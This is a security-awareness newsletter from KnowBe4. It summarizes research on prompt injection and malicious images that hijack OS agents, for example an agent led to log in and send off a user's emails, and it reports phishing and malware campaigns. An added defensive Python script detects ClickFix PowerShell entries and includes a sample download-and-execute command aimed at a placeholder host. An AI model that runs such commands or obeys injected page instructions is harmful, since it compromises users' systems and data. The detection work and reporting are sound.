[Beware] When Your AI Helper Becomes a Hacker's Dream Tool
AI is getting eerily good at mimicking Iron Man's Jarvis: these so-called "OS agents" can now watch your screen, click buttons, fill out forms and manage apps on your computer or phone—all on their own.
That's cool... until things go sideways. Researchers from Zhejiang University and OPPO AI Center have mapped over 60 models and 50 agent frameworks, showing just how quickly this tech is advancing—and how fast our defenses are being left behind.
So, what could go wrong?
Hidden Instructions in Web Pages: Known as "Web Indirect Prompt Injection," attackers can plant sneaky commands in a webpage to hijack the agent's behavior. For example, imagine an agent that automatically connects to your company's email: one bad page and it might log in, grab your emails and send them off without you even touching the mouse.
Malicious Image Traps: A recent study revealed "malicious image patches" that are graphics crafted so that, when an agent takes a screenshot, the agent misinterprets it and takes harmful actions. Think of seeing a harmless wallpaper that actually tricks your AI into installing malware.
Mobile Threat Vectors: Mobile OS agents aren't safe either. A mapping of mobile LLM agents found 11 different attack areas—from tricks that mess with GUI reasoning to full-on hijacks. Every tested agent had at least one door wide open, and some fell victim to eight attack styles.
This isn't sci-fi, it's an urgent wake-up call. If your Jarvis-like helper has access to your inbox, calendar or sensitive systems, think about what might happen if it's tricked. We need to seriously work on security culture, not just for humans, but for AI assistants too.
More at VentureBeat: https://venturebeat.com/ai/study-warns-of-security-risks-as-os-agents-gain-control-of-computers-and-phones/
[Live Demo] Intelligent Email Defense: Automate, Remediate and Train from One Platform
As cyber attackers continue to outpace traditional defenses, it's not a question of if, but when sophisticated attacks will bypass your email security controls.
Phishing attacks are surging at an unprecedented 1,265% rate since 2022, largely driven by AI advancements. Most concerning, 31% of IT teams take more than five hours to respond to reported security issues, leaving your organization vulnerable during those critical hours when threats remain active in your users' inboxes.
During this demo, you'll discover how PhishER Plus can help take control back from rising AI phishing risks by:
Transforming your users into active threat sensors with one-click reporting via the Phish Alert Button
Accelerating response times with AI-powered automation that reduces manual email review by 85-99%
Providing comprehensive threat intelligence from a network of 13+ million global users and third-party integrations
Removing threats automatically from all mailboxes with PhishRIP before users can interact with them
Converting real attacks into targeted training opportunities with PhishFlip
Discover how PhishER Plus combines AI and human intelligence to transform your users from security risks into your most valuable defenders.
Date/Time: TOMORROW, Wednesday, August 20 @ 2:00 PM (ET)
Save My Spot: https://info.knowbe4.com/phisher-demo-2?partnerref=LCHN2
Russian APT Uses Spear Phishing Emails to Exploit New Zero-Day
The Russia-aligned threat actor "RomCom" used spear phishing emails with phony job applications to target a zero-day flaw in the popular archiving tool WinRAR, according to researchers at ESET. WinRAR has since patched the vulnerability.
The threat actor crafted malicious archives designed to exploit the zero-day and distributed them via spear phishing emails last month. The phishing emails were disguised as responses to job openings, with the malicious attachments posing as resumes. The attacks targeted "financial, manufacturing, defense, and logistics companies in Europe and Canada."
RomCom is known for conducting cybercrime alongside espionage-focused attacks. In this case, the group appears to have been targeting entities of interest to the Russian government. "RomCom (also known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts both opportunistic campaigns against selected business verticals and targeted espionage operations," the researchers write.
"The group's focus has shifted to include espionage operations collecting intelligence, in parallel with its more conventional cybercrime operations. The backdoor commonly used by the group is capable of executing commands and downloading additional modules to the victim's machine."
RomCom is a persistent and sophisticated group, and ESET notes that this is the third time the threat actor has used a zero-day vulnerability. "By exploiting a previously unknown zero-day vulnerability in WinRAR, the RomCom group has shown that it is willing to invest serious effort and resources into its cyberoperations," ESET says.
"This is at least the third time RomCom has used a zero-day vulnerability in the wild, highlighting its ongoing focus on acquiring and using exploits for targeted attacks. The discovered campaign targeted sectors that align with the typical interests of Russian-aligned APT groups, suggesting a geopolitical motivation behind the operation."
KnowBe4 enables your workforce to make smarter security decisions every day.
ESET has the story: https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
Now Live: KnowBe4 Defend Integrates with Microsoft Defender for Office 365
KnowBe4 Defend now integrates with Microsoft Defender for Office 365, creating a unified protection and threat management experience that SOC teams have been asking for. This collaboration marks the launch of Microsoft's new ICES (Integrated Cloud Email Security) vendor ecosystem, with KnowBe4 as one of only two launch partners, and revolutionizes how your organization defends against sophisticated email threats.
Why This Matters
As the threat landscape continues to evolve, a single security solution, regardless of how advanced, may not catch every threat variation or attack vector. KnowBe4 Defend complements Microsoft 365's existing email security with Agentic AI approaches and advanced inbound threat detection capabilities.
This integration allows you to maintain your Microsoft security investments while adding specialized threat detection and response.
What This Means for You
Seamless Integration - When Defend identifies potentially malicious messages, they'll automatically move to Microsoft's quarantine using your existing policies
Unified Management - Manage all threats from a single, familiar Microsoft interface with complete visibility into KnowBe4 Defend's decisions
Enhanced Protection - Get multiple layers of specialized detection that catch sophisticated attacks including BEC, APTs and targeted spear-phishing
Maximized Investment - Leverage your existing Microsoft security infrastructure while adding KnowBe4's specialized capabilities
Reduced Complexity - Eliminate friction between security tools and streamline your security operations
Ready to transform your email security? Check out KnowBe4 Defend today. https://info.knowbe4.com/defend-demo-em
Learn more about the integration: https://blog.knowbe4.com/how-knowbe4-defend-seamlessly-integrates-with-microsoft-defender-for-office-365-quarantine-and-why-soc-teams-should-care
BBB Alert: Tech Support Scammers Send Phony Podcast Invites
The Better Business Bureau (BBB) has warned that scammers are targeting high-profile employees and influencers with fake invitations to appear as a guest on popular celebrity podcasts. The scammer poses as the podcast's production manager, offering the target $2,000 for the appearance.
If the victim agrees, the attacker will ask them to hop into a virtual meeting to test their setup before the podcast. During this meeting, the attacker will attempt to take control of the victim's computer and/or steal login credentials for their social media accounts.
The BBB offers the following advice to help users avoid falling for the scam:
"Be skeptical of emails with strange formatting and language. In this specific scam, the podcast invitation email may have strange formatting with your full name in bold letters in a font size much larger than the rest of the email.
Check the email address of the invitation. Impostors will use fake email addresses that look very close to a real one. Take a good look at the email address before responding. Most official podcasts or businesses have their own email domain and will not use a '@gmail.com' email domain, for example. If you're unsure of the legitimacy of the email address, do a web search for the podcast's real contact information. You will be able to see the podcast's email domain and can verify if the communication is real. You can also reach out to the podcast on your own to verify the request you received.
If you're being offered a lot of money out of the blue, take it as a red flag. A popular scam tactic is to entice consumers or businesses with money. If you're asked by an unknown person to do something, and are told you'll get paid to do it, take caution.
Never let a stranger take control of your computer. It's the classic tech support scam – a scammer will pretend to be trustworthy and attempt to take control of your computer from another location. If they are successful, they may access your files and web browser to steal your information. Never let anyone take control of your computer. If you're ever asked to enter a code onto your screen, call a number that appears on a pop-up, or initiate a connection to another device, stop communication with the person and shut down your computer."
Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
The BBB has the story: https://www.bbb.org/all/business/business-scams/podcast-impostor-business-scam
5 Most Frequently Asked Questions About Human Risk Management
Human Risk Management (HRM) has emerged as both a "buzz phrase" and an essential enterprise cybersecurity competency. Yet many IT and security administrators are still unclear on what it means for their teams.
To help, KnowBe4 has put together concise answers to five of the most frequently asked questions about HRM:
Download this whitepaper to understand:
What is HRM?
Why is now the time for HRM?
How can you operationalize HRM?
Does HRM replace security awareness training?
How should you evaluate HRM vendors?
Download Now: https://info.knowbe4.com/5-faqs-human-risk-management-chn
North Korean Threat Actor Delivers Ransomware Via Phishing Emails
The North Korean threat actor ScarCruft has incorporated ransomware into its arsenal, according to researchers at South Korean security firm S2W. ScarCruft is known for conducting espionage operations, but North Korean state-sponsored groups often conduct financially motivated attacks to generate revenue for Pyongyang.
"The deployment of ransomware, traditionally uncommon in ScarCruft campaigns, represents a notable deviation from the group's historical focus on espionage," the researchers write. "This suggests a potential shift toward financially motivated operations, or an expansion of operational goals that now include disruptive or extortion-driven tactics."
The researchers observed the threat actor deploying ransomware in a campaign targeting South Koreans last month. The attackers sent phishing emails disguised as postal-code updates regarding changes in street addresses. The emails contained malicious LNK files embedded in RAR archives, which were designed to deliver a variety of different malware strains.
"Upon execution, the LNK dropped an AutoIt loader, which then fetched and executed additional payloads including a stealer, ransomware, and backdoor from an external server," S2W says. "Among the nine distinct malware samples identified in this campaign, the following are the most notable: NubSpy, LightPeek, TxPyLoader, FadeStealer, VCD Ransomware, and CHILLYCHINO, among others."
The threat actor has also ported its malware to new programming languages in order to expand targeting and evade detection. "Existing malware, as well as publicly available code, has been ported to alternative programming languages for reuse," the researchers write.
"Similar to the group's prior use of Go-based malware like AblyGo, this campaign features malware written in Rust, suggesting a pattern of using modern languages for enhanced versatility and detection evasion. These efforts indicate ScarCruft's ongoing focus on detection evasion and tooling."
The Record has the story: https://therecord.media/scarcruft-north-korea-hackers-add-ransomware
Let's stay safe out there.
Warm regards,
Stu Sjouwerman, SACP
Executive Chairman
KnowBe4, Inc.
PS: KnowBe4 Named a 2025 Gartner Peer Insights™ Customers' Choice for Email Security Platforms: https://blog.knowbe4.com/knowbe4-named-a-2025-gartner-peer-insights-customers-choice-for-email-security-platforms
PPS: Your KnowBe4 Compliance Plus Fresh Content Updates from July 2025: https://blog.knowbe4.com/your-knowbe4-compliance-plus-fresh-content-updates-from-july-2025
"At the center of your being you have the answer; you know who you are and you know what you want." - Lao Tzu - Philosopher (6th Century BC)
"Knowing yourself is the beginning of all wisdom." - Aristotle, Philosopher (384–322 BC)
Thanks for reading CyberheistNews
You can read CyberheistNews online at our Blog https://blog.knowbe4.com/cyberheistnews-vol-15-33-beware-when-your-ai-helper-becomes-a-hackers-dream-tool
Social Engineering Attacks Distribute CastleLoader Malware
Researchers at PolySwarm warn that attackers are using social engineering tactics to deliver the CastleLoader malware. CastleLoader is a relatively new malware loader designed to deliver a variety of remote access Trojans (RATs), including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader and SectopRAT.
"CastleLoader's primary infection vector is the ClickFix phishing technique, often themed around Cloudflare services," the researchers write. "Victims are lured to fraudulent domains mimicking software development libraries, online meeting platforms like Google Meet, or browser update notifications.
"These pages display fake error messages or CAPTCHA prompts, tricking users into copying and executing malicious PowerShell commands via the Windows Run prompt. This method bypasses traditional email-based security by exploiting user-initiated actions."
The attackers also target more technical users by planting the malware in spoofed GitHub repos. These repositories impersonate popular tools, but contain hidden functionality to install the malware in the background.
"Alternatively, CastleLoader leverages fake GitHub repositories, such as one disguised as SQL Server Management Studio (SSMS-lib), to distribute malicious installers," PolySwarm says. "These repositories exploit developers' trust in GitHub, prompting them to run seemingly legitimate software that connects to a command-and-control (C2) server."
CastleLoader has compromised hundreds of devices since May 2025, with a notable focus on US government entities. The researchers note that its "high success rate underscores the malware's effectiveness in exploiting human behavior and trusted platforms."
Organizations need to be particularly wary of ClickFix attacks. This technique recently skyrocketed in popularity, and can grant attackers a foothold within your network while evading technical security controls.
Relevant and engaging security awareness training gives your organization an essential layer of defense against phishing and other social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day.
PolySwarm has the story: https://blog.polyswarm.io/castleloader
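One way to triage for the Run-prompt step of ClickFix described above, as an added example that is not from PolySwarm or this newsletter: Windows records commands typed into the Run dialog in the per-user RunMRU registry key, so an exported copy of that key can be checked for PowerShell one-liners. The indicator patterns are heuristic assumptions and the sample export is constructed.

```python
import re

# Heuristic indicators (assumptions for this example, not a vendor rule set).
INDICATORS = {
    "hidden_window": re.compile(r"\s-w\w*\s+(?:hidden|hid|h|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "web_download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "dynamic_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    # ClickFix pages often append a comment so the pasted text looks like a
    # verification string in the narrow Run box.
    "lure_comment": re.compile(r"#.*(?:robot|captcha|verif|cloudflare)", re.I),
}
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
SUFFIX = "\\1"  # every RunMRU command is stored with a trailing backslash-1


def runmru_commands(values):
    # `values` maps RunMRU value names to data, as exported from
    # HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
    # MRUList holds the single-letter value names, most recent first.
    order = values.get("MRUList", "")
    names = [n for n in order if n in values]
    names += sorted(n for n in values if n != "MRUList" and n not in names)
    commands = []
    for name in names:
        data = values[name]
        commands.append(data[:-len(SUFFIX)] if data.endswith(SUFFIX) else data)
    return commands


def triage(values):
    # Flag Run-dialog entries that start PowerShell and match an indicator.
    findings = []
    for cmd in runmru_commands(values):
        if not POWERSHELL.search(cmd):
            continue
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(cmd))
        if hits:
            findings.append({"command": cmd, "indicators": hits})
    return findings


# Constructed sample export; the URL uses the reserved .invalid TLD.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad" + SUFFIX,
    "b": "powershell -NoProfile -Command Get-Date" + SUFFIX,
    "c": 'powershell -w hidden -c "iwr https://example.invalid/verify | iex"'
         " # I am not a robot: Cloudflare verification ID 0000" + SUFFIX,
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_RUNMRU):
        print(finding["indicators"], "<-", finding["command"])
```

A hit is a lead for the analyst, not a verdict: administrators also launch PowerShell from the Run dialog, which is why the plain `Get-Date` entry is left unflagged.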
Scam Alert: Smishing Messages Warn of Phony Amazon Product Recall
Malwarebytes warns of a wave of SMS phishing (smishing) texts that pose as product recall messages from Amazon. The text messages state, "We are contacting you because the product you purchased is being recalled. This recall is due to quality and safety issues. We urge you to stop using the product immediately and contact us to arrange a full refund."
The messages contain a link for more details. This link is a shortened URL that spoofs Amazon's domain and leads to a phishing site designed to steal users' credentials or money.
The messages are crafted to grab the attention of anyone who recently purchased something on Amazon. "The text messages are intentionally vague about the nature of the product or the exact issue they are being recalled for," Malwarebytes says.
"This is done so [that] a maximum number of people will think that this might concern them. If the scammers said that the TV you bought might explode, you wouldn't click the link if you hadn't purchased a TV recently."
Malwarebytes offers some advice to help users avoid falling for these scams:
"If you receive a text like this, don't click on any links. Instead, check if it's legit by logging in to the Amazon app or website, then going to Message Centre under Your Account. Legitimate messages from Amazon will appear there.
"Report the scam to Amazon itself, whether you've fallen for it or not. US citizens can send unwanted texts to 7726(SPAM) or use the Report Junk option.
"Set up two-step verification for your Amazon account. This puts an extra barrier between you and the scammers if they do manage to get hold of your login details."
Malwarebytes has the story: https://www.malwarebytes.com/blog/news/2025/08/that-amazon-safety-recall-message-may-well-be-a-scam
Warn your parents - An advisory from the FTC on a surge in scams targeting older Americans: https://www.ftc.gov/news-events/data-visualizations/data-spotlight/2025/08/false-alarm-real-scam-how-scammers-are-stealing-older-adults-life-savings
'Chairmen' of $100 million scam operation extradited: https://www.bleepingcomputer.com/news/security/us-charges-ghanaians-linked-to-theft-of-100-million-in-romance-scams-bec-attacks/
North Korean Kimsuky hackers exposed in alleged data breach: https://www.bleepingcomputer.com/news/security/north-korean-kimsuky-hackers-exposed-in-alleged-data-breach/
US govt seizes $1 million in crypto from BlackSuit ransomware gang: https://www.bleepingcomputer.com/news/security/us-govt-seizes-1-million-in-crypto-from-blacksuit-ransomware-gang/
Deepfake AI Trading Scams Target Global Investors: https://www.infosecurity-magazine.com/news/deepfake-ai-trading-scams-target/
GSA introduces USAi.Gov to streamline AI adoption across government: https://www.nextgov.com/artificial-intelligence/2025/08/gsa-introduces-usaigov-streamline-ai-adoption-across-government/407443
SANS report finds humans still the main attack vector as 80% of organizations flag social engineering as their number one risk: https://www.sans.org/mlp/ssa-security-awareness-report
FBI: Cybercriminals create fictitious law firms to target victims of previous scams: https://www.ic3.gov/PSA/2025/PSA250813
Scammers set up over a thousand malicious gaming sites: https://krebsonsecurity.com/2025/07/scammers-unleash-flood-of-slick-online-gaming-sites/
Phishing URLs use Japanese Unicode characters to spoof forward slashes: https://www.bleepingcomputer.com/news/security/bookingcom-phishing-campaign-uses-sneaky-character-to-trick-you/
This Week's Links We Like, Tips, Hints and Fun Stuff
Virtual Vaca #1 to Australia, the Great Ocean Road Trip Itinerary (Highlights + Tips): https://youtu.be/k8nuzc78bxQ
Virtual Vaca #2 to amazing Abandoned Ancient Berber Cities, Tunisia: https://youtu.be/c_YbbcdWwnU
BONUS Virtual Vaca From Rome to Giza. Two World Wonders in One Weekend: https://youtu.be/pt8IjgiMTiQ
Wanna See an Epic Wingsuit Flight? | Slovenia's Finest: https://youtu.be/BY3T3u-mYr8
The LONGEST Mountain Swoop In the World | "MUTANT line": https://youtu.be/p0DysLyOtWo
Mario Lopez is one of the recent big surprises of the world of magic - his magic is original, simple, different, and fresh: https://www.flixxy.com/mario-lopez-fools-penn-and-teller.htm?utm_source=4
Rivian: First Drives of their Gen 2 Quad. These EVs look very good: https://youtu.be/oR_6YxJ-jPc
[CLASSIC] Drag Race Tesla Cybertruck v Lamborghini Urus. Who gets destroyed?: https://youtu.be/3ZmpxFZ3QIk
Maps That Changed The Way I See The World: https://youtu.be/abOfMAwQdno?si=UWE0EMU_ffXvBfhx
Why The Next (Brisbane, Australia) Olympics Are Already a Mess: https://youtu.be/uTcvKlNI_mE
[SUPER INTERESTING] Why is this benchmark symbol hidden everywhere in the UK?: https://youtu.be/sWxXyR4ifbk?si=ArWQ8l5TGjExSmwi
For Da Kids #1 - Cat Will Not Begin His Day Without His Own Cat-uccino: https://youtu.be/ITLlC5EVi_U
For Da Kids #2 - Rescue dog looks at mom with sweetest smile: https://youtu.be/oBZAuADLAUQ
For Da Kids #3 - Stranger crosses rushing river to save stranded monkey: https://youtu.be/N4XMHgH5Lbg
For Da Kids #4 - German Shepherd Attacks Owner with Love!: https://youtu.be/Wd2vAm-Zak8
For Da Kids #5 - The animals' meeting with the Wolf in Wes Anderson's film 'Fantastic Mr. Fox': https://www.flixxy.com/fantastic-mr-fox-meeting-the-wolf.htm